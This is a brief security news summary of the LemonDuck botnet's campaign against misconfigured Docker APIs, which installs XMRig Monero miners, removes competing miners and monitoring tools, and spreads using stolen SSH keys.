"LemonDuck Botnet Plunders Docker Cloud Instances in Cryptocurrency Crime Wave"

LemonDuck botnet operators are targeting Docker instances in a cryptocurrency mining campaign. According to researchers, LemonDuck is a cryptocurrency mining malware with a botnet structure that exploits older vulnerabilities such as the Microsoft Exchange ProxyLogon bugs to gain access to cloud systems and servers. Microsoft's security team noted that the threat actors behind the LemonDuck malware are selective in regard to timing, so they may execute an attack when teams are focused on patching a vulnerability, not the investigation of compromise. Crowdstrike says LemonDuck has expanded its operations from Windows machines to Linux and Docker. The threat actors are now targeting Docker Application Programming Interfaces (APIs) to infiltrate cloud instances. Researchers found that LemonDuck is taking advantage of the misconfigurations in instances that lead to API exposure in order to deploy exploit kits and launch malware. In one case, an API was used to run a custom Docker ENTRYPOINT instruction and download an image file disguised as a Bash script. The file was downloaded from a domain in LemonDuck's command-and-control (C2) infrastructure. Researchers noted the discovery of multiple campaigns being operated through the domain targeting Windows and Linux. The image file launches a Linux cronjob in the vulnerable container and then downloads a secondary Bash file, which is the main LemonDuck payload. After LemonDuck is triggered by the cronjob, it kills network connections, rival cryptocurrency mining operations, existing ties to mining pools, and other processes. The malware will also target known daemons responsible for monitoring, such as Alibaba Cloud's monitoring service. Once the server is prepared, the cryptocurrency mining operation begins. XMRig, used to generate Monero (XMR), is executed with a configuration set to proxy pools in order to hide the attacker's true cryptocurrency wallet address. The malware goes beyond one Docker instance as it also searches for SSH keys in the file system to log into other servers and repeat its operations. This article continues to discuss the LemonDuck botnet's targeting of exposed Docker APIs.

ZDNet reports "LemonDuck Botnet Plunders Docker Cloud Instances in Cryptocurrency Crime Wave"